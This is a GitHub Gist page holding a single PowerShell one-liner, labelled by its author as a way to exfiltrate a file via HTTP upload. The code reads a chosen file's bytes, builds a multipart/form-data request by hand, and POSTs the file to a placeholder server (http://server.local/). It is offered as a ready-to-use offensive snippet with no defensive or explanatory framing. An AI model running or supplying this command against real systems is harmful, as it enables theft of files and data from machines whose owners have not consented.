Created
August 26, 2024 00:14
-
-
Save r0t0shell/3b8f5466185269ac4cd87a66f724e304 to your computer and use it in GitHub Desktop.
A PowerShell one-liner to exfiltrate a file via HTTP file upload.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $F = Get-Item ".\filename"; $C = [System.IO.File]::ReadAllBytes($F.FullName); $R = [System.Net.WebRequest]::Create("http://server.local/"); $B=[System.Guid]::NewGuid().ToSTring(); $R.Method = "POST"; $R.ContentType = "multipart/form-data; boundary=$B"; $S = $R.GetRequestStream(); $E = [System.Text.Encoding]::ASCII; $S.Write($E.GetBytes("--$B`r`n"), 0, ("--$B`r`n").Length); $S.Write($E.GetBytes("Content-Disposition: form-data; name=`"file`"; filename=`"$($F.Name)`"`r`n"), 0, ("Content-Disposition: form-data; name=`"file`"; filename=`"$($F.Name)`"`r`n").Length); $S.Write($E.GetBytes("Content-Type: application/octet-stream`r`n`r`n"), 0, ("Content-Type: application/octet-stream`r`n`r`n").Length); | |
| $S.Write($C, 0, $C.Length); $S.Write($E.GetBytes("`r`n--$B--`r`n"), 0, ("`r`n--$B--`r`n").Length); $S.Close(); $RE = $R.GetResponse(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment